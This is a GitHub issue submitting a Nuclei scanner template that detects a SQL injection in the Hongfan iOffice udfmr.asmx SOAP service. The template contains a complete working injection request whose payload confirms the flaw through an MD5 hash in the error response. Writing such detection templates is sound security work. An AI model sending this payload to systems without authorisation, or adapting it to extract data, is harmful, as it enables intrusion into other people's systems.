### ISSUE TITLE
hongfan-ioffice-udfmr-sqli

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7988]
### Template Information:

hongfan-ioffice-udfmr-sqli
app="红帆-ioffice"

### Nuclei Template:

```yaml
id: hongfan-ioffice-udfmr-sqli
info:
  name: hongfan-ioffice-udfmr-sqli
  author: SleepingBag945
  severity: high
  description: 红帆iOffice的udfmr.asmx文件存在sql注入漏洞
  reference:
    - https://planet.vulbox.com/detail/MTEyNjk=
  tags: hongfan,oa,sqli

http:
  - raw:
      - |
        POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: */*
        Content-Type: text/xml; charset=utf-8
        Accept-Encoding: gzip

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
        <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
        <condition>1=substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','8723172065')),3,32)</condition>
        </GetEmpSearch>
        </soap:Body>
        </soap:Envelope>


    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 500 && contains(body_1, "fe8c4c6dba0a2ede26ae3e1958d6b41d")'
        condition: and
```
